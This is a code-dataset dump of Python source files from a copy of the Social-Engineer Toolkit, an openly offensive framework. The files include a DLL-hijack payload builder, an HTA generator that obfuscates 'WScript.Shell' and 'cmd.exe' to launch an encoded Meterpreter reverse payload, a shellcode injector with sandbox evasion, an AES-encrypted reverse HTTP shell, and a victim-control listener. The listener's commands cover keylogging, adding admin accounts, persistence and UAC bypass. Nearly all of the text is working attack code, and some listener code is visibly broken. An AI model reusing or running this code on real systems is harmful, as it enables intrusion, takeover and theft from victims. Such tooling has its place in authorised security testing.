| 248 | Python | .py | 9 | 25.222222 | 75 | 0.770213 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,818 | hijacking.py | CHEGEBB_africana-framework/externals/set/src/webattack/dll_hijacking/hijacking.py | #!/usr/bin/env python3
##################################
# Code behind the DLL Hijacker
####################################
import os
import re
import subprocess
import time
import sys
import glob
import binascii
from src.core.menu.text import dll_hijacker_text
from src.core.setcore import *
definepath = os.getcwd()
try:
import zipfile
except ImportError as error:
log(error)
print("Module 'zipfile' was not detected, please download and install the python zipfile module")
exit_set()
print(dll_hijacker_text)
# open the repository, its simple name,extension,dll
fileopen = open("src/webattack/dll_hijacking/repository", "r")
# set base counter for our pick
print(" Enter the choice of the file extension you want to attack:\n")
counter = 1
for line in fileopen:
line = line.split(",")
print(" " + str(counter) + ". " + line[0])
counter = counter + 1
print("\n")
choice = input(setprompt(["2", "15"], ""))
if choice == 'exit':
exit_set()
if choice == "":
choice = "1"
choice = int(choice)
# reset the counter and get our payload ready and selected
counter = 1
fileopen = open("src/webattack/dll_hijacking/repository", "r")
for line in fileopen:
line = line.split(",")
if int(counter) == int(choice):
name = line[0].rstrip()
extension = "." + line[1].rstrip()
dll = line[2].rstrip()
counter = counter + 1
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
# prep the directories
subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait()
filename1 = input(setprompt(
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
if filename1 == "":
filename1 = "openthis"
# move the files there using the correct extension and file type
filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w")
filewrite.write("EMPTY")
filewrite.close()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["2", "15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# replace ipaddress with one that we need for reverse connection back
fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "dll/%s" % (dll), "wb")
host = int(len(ipaddr) + 1) * "X"
filewrite.write(data.replace(bytes(host, 'utf-8'), bytes(ipaddr, 'utf-8') + b"\x00", 1))
filewrite.close()
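# What the patch above does (sketch, example address only): hijacking.dll ships with
# a placeholder run of "X" bytes one byte longer than the IP string; data.replace()
# overwrites it with the attacker address plus a NULL terminator, e.g. the 11-byte
# placeholder "XXXXXXXXXXX" becomes "192.0.2.10\x00" when ipaddr is "192.0.2.10".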
# ask what they want to use
print("""
    Do you want to use a zip file or a rar file? The problem with zip
    is that the target will have to extract the files first; you can't just
    open the file from inside the zip. Rar does not have this
    restriction and is more reliable.
1. Rar File
2. Zip File
""")
# flag a choice
choice = input(setprompt(["2", "15"], "[rar]"))
# if default was selected just do rar
if choice == "":
choice = "1"
# if its not a rar file
if choice != "1":
# if its not a zipfile, you messed up
if choice != "2":
# default to rar file
choice = "1"
# if its choice 1 do some rar stuff
if choice == "1":
# basic counter
counter = 0
# look for rar in default directories
rar_check = subprocess.Popen("rar", shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match = re.search(b"Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
(userconfigpath, userconfigpath), shell=True).wait()
counter = 1
# if we didnt find rar
if counter == 0:
print("[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory.")
print("[*] Defaulting to zipfile for the attack vector. Sorry boss.")
choice = "2"
# if its a zipfile zip the badboy up
if choice == "2":
# write to a zipfile here
file = zipfile.ZipFile(userconfigpath + "template.zip", "w")
for name in glob.glob(userconfigpath + "dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close()
if os.path.isfile(userconfigpath + "msf.exe"):
subprocess.Popen("cp %s/msf.exe %s/src/html/" %
(userconfigpath, definepath), shell=True).wait()
| 4,494 | Python | .py | 121 | 33.438017 | 128 | 0.666053 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,819 | main.py | CHEGEBB_africana-framework/externals/set/src/webattack/hta/main.py | #!/usr/bin/env python3
######################################################
#
# Main files for the HTA attack vector within SET
#
######################################################
from src.core.setcore import *
def gen_hta_cool_stuff():
print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = grab_ipaddress()
update_options("IPADDR=%s" % (ipaddr))
port = input("Enter the port for the reverse payload [443]: ")
if port == "": port = "443"
print("""Select the payload you want to deliver:\n\n 1. Meterpreter Reverse HTTPS\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse TCP\n""")
selection = input("Enter the payload number [1-3]: ")
# define the payloads
if selection == "": selection = "1"
if selection == "1": selection = "windows/meterpreter/reverse_https"
if selection == "2": selection = "windows/meterpreter/reverse_http"
if selection == "3": selection = "windows/meterpreter/reverse_tcp"
# generate powershell code
print_status("Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(selection, ipaddr, port, "x86")
command = (powershell_encodedcommand(ps))
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website
url = fetch_template()
command = command.replace("'", "\\'")
# generate random variable names for vba
hta_rand = generate_random_string(10, 30)
# split up so we arent calling shell command for cmd.exe
shell_split1 = generate_random_string(10, 30)
shell_split2 = generate_random_string(10, 30)
shell_split3 = generate_random_string(10, 30)
shell_split4 = generate_random_string(10, 30)
shell_split5 = generate_random_string(10, 30)
cmd_split1 = generate_random_string(10, 30)
cmd_split2 = generate_random_string(10, 30)
cmd_split3 = generate_random_string(10, 30)
cmd_split4 = generate_random_string(10, 30)
main1 = ("""<script>\n{0} = "WS";\n{1} = "crip";\n{2} = "t.Sh";\n{3} = "ell";\n{4} = ({0} + {1} + {2} + {3});\n{5}=new ActiveXObject({4});\n""".format(shell_split1, shell_split2, shell_split3, shell_split4, shell_split5, hta_rand, shell_split5))
main2 = ("""{0} = "cm";\n{1} = "d.e";\n{2} = "xe";\n{3} = ({0} + {1} + {2});\n{4}.run('%windir%\\\\System32\\\\""".format(cmd_split1,cmd_split2,cmd_split3,cmd_split4,hta_rand))
main3 = ("""' + {0} + """.format(cmd_split4))
main4 = ("""' /c {0}', 0);window.close();\n</script>""".format(command))
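    # Taken together, the four fragments above produce an .hta that rebuilds the
    # strings "WScript.Shell" and "cmd.exe" from concatenated pieces, runs
    # "cmd.exe /c <encoded PowerShell payload>" with a hidden window (style 0), and
    # then closes itself; the string splitting exists only to dodge naive signature
    # matching on those two strings.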
html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url)
# metasploit answer file here
filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# write out main1 and main2
filewrite = open(userconfigpath + "hta_index", "w")
filewrite.write(html_code)
filewrite.close()
# write out launcher.hta
filewrite = open(userconfigpath + "Launcher.hta", "w")
filewrite.write(main1 + main2 + main3 + main4)
filewrite.close()
| 3,485 | Python | .py | 58 | 55.344828 | 284 | 0.64956 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,820 | pyinjector_args.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/pyinjector_args.py | #!/usr/bin/python3
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]
# if we didn't specify a param
except IndexError:
sys.exit()
# decode the \x.. escape sequences in the argument into raw characters
# ("string_escape" was the Python 2 codec; unicode_escape is the Python 3 equivalent)
sc = sc.encode("latin-1").decode("unicode_escape")
# convert to a mutable bytearray, mapping each character back to its byte value
sc = bytearray(sc, "latin-1")
# use types windll.kernel32 for virtualalloc reserves region of pages in
# virtual address space
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
# read in the buffer
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
| 1,930 | Python | .py | 46 | 30.913043 | 78 | 0.591249 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,821 | http_shell.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/http_shell.py | #!/usr/bin/python3
##########################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.trustedsec.com
#
##########################################################################
#
##########################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################
#
##########################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
##########################################################################
import urllib.request
import urllib.parse
from Cryptodome.Cipher import AES
import sys
import os
import http.client
import subprocess
import base64
import time
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
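# Small illustration of the padding scheme (added sketch, not used by the shell):
# AES encrypts fixed-size blocks, so every plaintext is grown to the next multiple
# of BLOCK_SIZE with the PADDING character and stripped again after decryption.
def _padding_example():
    padded = pad("hello")
    # "hello" (5 chars) is padded out to a full 32-character block
    return len(padded), padded.rstrip(PADDING)   # -> (32, "hello")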
# secret key, change this if you want to be unique
secret = "(3j^%sh@hd3hDH2u3h@*!~h~2&^lk<!L"
# random junk
random = "sdfdsfdsdfsfd@#2$"
# create a cipher object using the random secret
cipher = AES.new(secret, AES.MODE_ECB)
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxystuff:80"
# USERNAME FOR THE PROXY
USERNAME = "username_here"
# PASSWORD FOR THE PROXY
PASSWORD = "password_here"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print(" \nAES Encrypted Reverse HTTP Shell by:")
print(" Dave Kennedy (ReL1K)")
print(" http://www.trustedsec.com")
print("Usage: shell.exe <reverse_ip_address> <rport>")
time.sleep(0.1)
sys.exit()
# loop forever
while 1:
    # open up our request handler
req = urllib.request.Request('http://%s:%s' % (address, port))
# grab our response which contains what command we want
message = urllib.request.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.parse.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = http.client.HTTPConnection('%s:%s' % (address, port))
# set our basic headers
headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
| 4,894 | Python | .py | 122 | 37.016393 | 116 | 0.620668 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,822 | listener.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/listener.py | #! /usr/bin/python3
from socket import *
import os
import threading
import sys
import re
import _thread as thread  # "thread" was renamed to "_thread" in Python 3
import time
import select
import base64
import datetime
import subprocess
import binascii
from src.core.setcore import *
definepath = os.getcwd()
sys.path.append(definepath)
# cleanup
if os.path.isfile(userconfigpath + "uac.address"):
os.remove(userconfigpath + "uac.address")
if os.path.isfile(userconfigpath + "system.address"):
os.remove(userconfigpath + "system.address")
# will remove this later
core_modules = True
####################################################################
# #
# The Social-Engineer Toolkit Interactive Shell Listener #
# #
####################################################################
def start_listener():
# grab the operating system
operating_system = check_os()
# try to import readline, if not, disable tab completion
tab_complete = True
try:
import readline
# handle exception if readline isn't imported
except ImportError:
print("[!] python-readline is not installed, tab completion will be disabled.")
# turn tab_complete to false and disable it
tab_complete = False
# specify we are using core module, need to clean this up and remove later
core_module = True
# allow readline tab completion
if tab_complete == True:
readline.parse_and_bind("tab: complete")
HOST = '' # bind to all interfaces
# try command line arguments first
try:
PORT = int(sys.argv[1])
# handle index error
except IndexError:
if check_options("PORT=") != 0:
PORT = check_options("PORT=")
else:
# port number prompt for SET listener
PORT = input(setprompt("0", "Port to listen on [443]"))
if PORT == "":
# if null then default to port 443
print("[*] Defaulting to port 443 for the listener.")
PORT = 443
update_options("PORT=443")
try:
# make the port an integer
PORT = int(PORT)
except ValueError:
while 1:
print_warning("Needs to be a port number!")
PORT = input(setprompt("0", "Port to listen on: "))
if PORT == "":
PORT = 443
break
try:
PORT = int(PORT)
break
except ValueError:
PORT = 443
break
# log error messages
def log(error):
        # check to see if the logs directory exists
        if os.path.isdir("src/logs/"):
            # grab the date and time for now
            now = datetime.datetime.today()
            # all error messages will be posted in set_logfile.log
            filewrite = open("src/logs/set_logfile.log", "a")
            # str() both values; "now" is a datetime object and "error" may be an exception
            filewrite.write(str(now) + " " + str(error) + "\r\n")
            filewrite.close()
# specify it as nothing until we make it past our encryption check
try:
from Cryptodome.Cipher import AES
# set encryption key to 1
encryption = 1
print_status(
"Crypto.Cipher library is installed. AES will be used for socket communication.")
print_status(
"All communications will leverage AES 256 and randomized cipher-key exchange.")
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# generate a random secret key
secret = os.urandom(BLOCK_SIZE)
# create a cipher object using the random secret
cipher = AES.new(secret, AES.MODE_ECB)
# if it isn't import then trigger error and turn off encryption
except ImportError:
# this means that python-crypto is not installed and we need to set the
# encryption flag to 0, which turns off communications
encryption = 0
print_warning(
"Crypto.Cipher python module not detected. Disabling encryption.")
if operating_system != "windows":
print_warning(
"If you want encrypted communications download from here: http://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.3.tar.gz")
print_warning(
"Or if your on Ubuntu head over to: http://packages.ubuntu.com/search?keywords=python-crypto")
print_warning(
"Or you can simply type apt-get install python-crypto or in Back|Track apt-get install python2.5-crypto")
# universal exit message
def exit_menu():
print("\n[*] Exiting the Social-Engineer Toolkit (SET) Interactive Shell.")
mysock = socket.socket(AF_INET, SOCK_STREAM)
mysock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
addr = (HOST, PORT)
try:
mysock.bind(addr)
mysock.listen(100000)
except Exception as error:
if core_modules == True:
log(error)
print_error(
"ERROR:Unable to bind to listener port, do you have something else listening?")
sys.exit() # exit_set()
if core_modules == False:
sys.exit("[!] Unable to bind to interfact. Try again.")
# base count handler
count = 0
# send packet is used to determine if encryption is in use or not
def send_packet(message, conn, encryption):
# we put a try/except block here in case of socket error. if it has an exception
# here, it would completely kill the session. we want to make it as stable as possible even
# after error.
try:
# if encryption is enabled then send this
if encryption == 1:
# we encrypt our output here
encoded = EncodeAES(cipher, message)
# we take the length of the encrypted string
normal_size = len(encoded)
# we turn the length of our string into a string literal
normal_size = str(normal_size)
# we encrypt our string literal
normal_size_crypt = EncodeAES(cipher, normal_size)
# we send our encrypted string literal to let our server know how long the
# true encrypted string is
conn.send(str(normal_size_crypt))
time.sleep(0.3)
# we send our encrypted string
conn.send(str(encoded))
# if encryption is disabled then send this
if encryption == 0:
message_size = str(len(message))
conn.send(message_size)
conn.send(str(message))
# handle exceptions
except Exception as e:
print_warning(
"An exception occured. Handling it and keeping session alive. Error: " + str(e))
pass
# decrypt received packets
def decrypt_packet(message, encryption):
# try/except block to keep socket alive
try:
# if encrypt then decode
if encryption == 1:
return DecodeAES(cipher, message)
# if not encrypted then return result
if encryption == 0:
return message
# handle exceptions
except Exception as e:
print_warning(
"An exception occured. Handling it and keeping session alive. Error: " + str(e))
pass
# handle tab completion here for set interactive menu
class Completer:
def __init__(self):
if operating_system == "windows":
self.words = ["shell", "localadmin", "help", "?", "domainadmin", "ssh_tunnel", "bypassuac", "lockworkstation", "grabsystem", "download",
"upload", "ps", "kill", "keystroke_start", "keystroke_dump", "reboot", "persistence", "removepersistence", "shellcode", "cls", "clear"]
if operating_system == "posix":
self.words = ["shell", "help", "?", "ssh_tunnel",
"download", "upload", "reboot", "cls", "clear"]
self.prefix = None
def complete(self, prefix, index):
if prefix != self.prefix:
self.matching_words = [
w for w in self.words if w.startswith(prefix)]
self.prefix = prefix
else:
pass
try:
return self.matching_words[index]
except IndexError:
return None
# handle tab completion here for initial choice selection
class Completer2:
def __init__(self):
self.words = []
self.prefix = None
def complete(self, prefix, index):
if prefix != self.prefix:
self.matching_words = [
w for w in self.words if w.startswith(prefix)]
self.prefix = prefix
else:
pass
try:
return self.matching_words[index]
except IndexError:
return None
# main socket handler
def handle_connection(conn, addr, encryption, operating_system):
print_status(
"Dropping into the Social-Engineer Toolkit Interactive Shell.")
# put an exceptions block in here
try:
# if we are leveraging encryption
if encryption == 1:
# generate a random 52 character string
random_string = os.urandom(52)
data = conn.send(random_string)
# confirm that we support encryption
data = conn.recv(1024)
if data == random_string:
# This method probably isn't the most desirable since it can
# be intercepted and unhex'd during transmission. Provides a
# good level of encryption unless the ciphertext is used as the
# AES decryption string. This is a first pass, will improve over
# time. Could hardcode keys on server/client but would have an
# even less desirable effect. Overall, solution will be to use
# pub/private RSA certs
secret_send = binascii.hexlify(secret)
conn.send(secret_send)
# if we didn't receive the confirmation back then we don't
# support encryption
else:
encryption = 0
# if we aren't using encryption then tell the victim
if encryption == 0:
# generate a random 51 character string
random_string = os.urandom(51)
conn.send(random_string)
# acknowledge encryption has been disabled
data = conn.recv(51)
# decrypt the data if applicable
data = decrypt_packet(data, encryption)
except Exception as e:
print(e)
print_warning(
"Looks like the session died. Dropping back into selection menu.")
return_continue()
global count
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit() # exit_set()
# initial try loop to catch keyboard interrupts and exceptions
try:
# start initial loop for menu
while 1:
# main SET menu
if tab_complete == True:
completer = Completer()
readline.set_completer(completer.complete)
data = input(setprompt(["25"], ""))
# if data is equal to quit or exit then break out of loop and
# exit
if data == "quit" or data == "exit" or data == "back":
print_warning("Dropping back to list of victims.\n")
send_packet("quit", conn, encryption)
break
if data == "cls" or data == "clear":
os.system("clear")
# if user specifies help do this
if data == "help" or data == "?":
print("Welcome to the Social-Engineer Toolkit Help Menu.\n\nEnter the following commands for usage:")
# universal commands
if operating_system == "posix" or operating_system == "windows":
print("""
Command: shell
Explanation: drop into a command shell
Example: shell
Command: download <path_to_file>
Explanation: downloads a file locally to the SET root directory.
Example: download C:\\boot.ini or download /etc/passwd
Command: upload <path_to_file_on_attacker> <path_to_write_on_victim>
Explanation: uploads a file to the victim system
Example: upload /root/nc.exe C:\\nc.exe or upload /root/backdoor.sh /root/backdoor.sh
Command: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>
Explanation: This module tunnels ports from the compromised victims machine back to your machine.
Example: ssh_tunnel publicipaddress 22 80 root complexpassword?! 80
Command: exec <command>
Explanation: Execute a command on your LOCAL 'attacker' machine.
Example: exec ls -al
Command: ps
Explanation: List running processes on the victim machine.
Example: ps
Command: kill <pid>
Explanation: Kill a process based on process ID (number) returned from ps.
Example: kill 3143
Command: reboot now
Explanation: Reboots the remote server instantly.
Example: reboot now""")
# if we're running under windows
if operating_system == "windows":
print("""
Command: localadmin <username> <password>
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!
Command: domainadmin <username> <password>
Explanation: adds a domain admin to the system
Example: domainadmin bob p@55w0rd!
Command: bypassuac <ipaddress_of_listener> <port_of_listener> <x86 or x64>
Explanation: Trigger another SET interactive shell with the UAC safe flag
Example: bypassuac 172.16.32.128 443 x64
Command: grabsystem <ipaddress_of_listener> <port_of_listener>
Explanation: Uploads a new set interactive shell running as a service and as SYSTEM.
Caution: If using on Windows 7 with UAC enabled, run bypassuac first before running this.
Example: grabsystem 172.16.32.128 443
Command: keystroke_start
Explanation: Starts a keystroke logger on the victim machine. It will stop when shell exits.
Example: keystroke_start
Command: keystroke_dump
Explanation: Dumps the information from the keystroke logger. You must run keystroke_start first.
Example: keystroke_dump
Command: lockworkstation
Explanation: Will lock the victim's workstation, forcing them to log back in. Useful for capturing keystrokes.
Example: lockworkstation
Command: persistence <ipaddress_of_listener> <port_of_listener>
Explanation: Persistence will spawn a SET interactive shell every 30 minutes on the victim machine.
Example: persistence 172.16.32.128 443
Warning: Will not work with UAC enabled *yet*.
Command: removepersistence
Explanation: Will remove persistence from the remote victim machine.
Example: removepersistence
Command: shellcode
Explanation: This will execute native shellcode on the victim machine through python.
Example: shellcode <enter> - then paste your shellcode (\x41\x41, etc.)
""")
try:
# base counter to see if command is invalid
base_counter = 0
# do a quick search to execute a local command
match = re.search("exec", data)
if match:
# trigger we hit
base_counter = 1
# define temp_data to test if we have more than one
# command other than exec
temp_data = data.split(" ")
# remove the exec name from the command
data = data.replace("exec ", "")
# grab the command
command = data
# assign data to exec for handler below
data = "exec"
# see if we have a value; if not, this throws an IndexError
data = "exec test"
data = data.split(" ")
temp_data = temp_data[1]
data = "exec"
# split into tuple in case localadmin is used
data = data.split(" ")
# if data[0] is localadmin then split up the creds and data
if data[0] == "localadmin":
creds = "%s,%s" % (data[1], data[2])
data = "localadmin"
base_counter = 1
# if data[0] is domainadmin then split up the creds and
# data
if data[0] == "domainadmin":
creds = "%s,%s" % (data[1], data[2])
data = "domainadmin"
base_counter = 1
# if data[0] is equal to shell then go to normal
if data[0] == "shell":
base_counter = 1
data = data[0]
# if data[0] is equal to download
if data[0] == "download":
# assign download_path
download_path = data[1]
# assign data[0]
data = data[0]
base_counter = 1
# if data[0] is equal to ssh_port_forward then use port
# forwarding
if data[0] == "ssh_tunnel":
# IP of the SSH server
ssh_server_ip = data[1]
# PORT of the SSH server
ssh_server_port_address = data[2]
# PORT to use on localhost for the tunneled protocol
ssh_server_tunnel_port = data[3]
# username for SSH server
ssh_server_username = data[4]
# password for SSH server
ssh_server_password = data[5]
# PORT to forward from victim
victim_server_port = data[6]
# specify data as ssh_port_tunnel
data = data[0]
base_counter = 1
# if data[0] is equal to upload_file
if data[0] == "upload":
# assign executable path to upload
upload = data[1]
# assign path to write file on opposite side
write_path = data[2]
# assign data[0]
data = data[0]
base_counter = 1
# bypassuac
if data[0] == "bypassuac":
# ipaddress and port
ipaddress = data[1] + " " + data[2]
exe_platform = data[3]
data = data[0]
base_counter = 1
# persistence
if data[0] == "persistence":
ipaddress = data[1] + " " + data[2]
data = data[0]
base_counter = 1
if data[0] == "removepersistence":
base_counter = 1
data = data[0]
if data[0] == "keystroke_start":
data = "keystroke_start"
base_counter = 1
if data[0] == "keystroke_dump":
data = "keystroke_dump"
base_counter = 1
# grabsystem
if data[0] == "grabsystem":
# define ipaddress
ipaddress = data[1] + " " + data[2]
data = data[0]
base_counter = 1
# lock workstation
if data[0] == "lockworkstation":
data = "lockworkstation"
base_counter = 1
# if data[0] is equal to ps
if data[0] == "ps":
data = "ps"
base_counter = 1
# if data[0] is equal to reboot
if data[0] == "reboot":
if data[1] == "now":
data = "reboot now"
base_counter = 1
# if data[0] is equal kill
if data[0] == "kill":
pid_number = data[1]
data = "kill"
base_counter = 1
# if data[0] is equal to exec
if data[0] == "exec":
data = "exec"
base_counter = 1
# shellcodeexec
if data[0] == "shellcode":
shellcode_inject = input(
"Paste your shellcode into here: ")
shellcode_inject = shellcode_inject.decode(
"string_escape")
data = "shellcode"
base_counter = 1
if data[0] == "help" or data[0] == "?":
base_counter = 1
if data[0] == "":
base_counter = 1
if data[0] == "cls" or data[0] == "clear":
base_counter = 1
if base_counter == 0:
print("[!] The command was not recognized.")
# handle range errors and throw correct syntax
except IndexError:
if data[0] == "kill":
print("[!] Usage: kill <pid_id>")
if data[0] == "exec":
print("[!] Usage: exec <command>")
if data[0] == "bypassuac":
print("[!] Usage: bypassuac <set_reverse_listener_ip> <set_port> <x64 or x86>")
if data[0] == "upload":
print("[!] Usage: upload <filename> <path_on_victim>")
if data[0] == "download":
print("[!] Usage: download <filename>")
if data[0] == "ssh_tunnel":
print("[!] Usage: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>")
if data[0] == "domainadmin":
print("[!] Usage: domainadmin <username> <password>")
if data[0] == "localadmin":
print("[!] Usage: localadmin <username> <password>")
if data[0] == "grabsystem":
print("[!] Usage: grabsystem <ipaddress_of_listener> <port_of_listener>")
if data[0] == "reboot":
print("[!] Usage: reboot now")
if data[0] == "persistence":
print("[!] Usage: persistence <set_reverse_listener_ip> <set_port>")
if data[0] == "shellcode":
print("[!] Usage: shellcode <paste shellcode>")
# in case of an attribute error just pass and restart
except AttributeError as e:
# write to log file then pass
log(e)
pass
# handle the rest of errors
except Exception as e:
print("[!] Something went wrong, printing error: " + str(e))
log(e)
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit()
# if data is equal to shell
if data == "shell":
send_packet(data, conn, encryption)
print("[*] Entering a Windows Command Prompt. Enter your commands below.\n")
while 1:
try:
# accept raw input
data = input(setprompt(["25", "26"], ""))
# if we specify exit or quit then get out
if data == "exit" or data == "quit" or data == "back":
print("[*] Dropping back to interactive shell... ")
send_packet(data, conn, encryption)
break
if data != "":
send_packet(data, conn, encryption)
# this will receive length of data socket we
# need
data = conn.recv(1024)
# decrypt the data length
data = decrypt_packet(data, encryption)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while 1:
data = conn.recv(1024)
if not data:
break
dataout += data
MSGLEN = MSGLEN + len(data)
if MSGLEN == int(length):
break
# decrypt our command line output
data = decrypt_packet(dataout, encryption)
# display our output
print(data)
# handle error generally means base 10 error message which means there
# was no response. Socket probably died somehow.
except ValueError as e:
# write to log file
log(e)
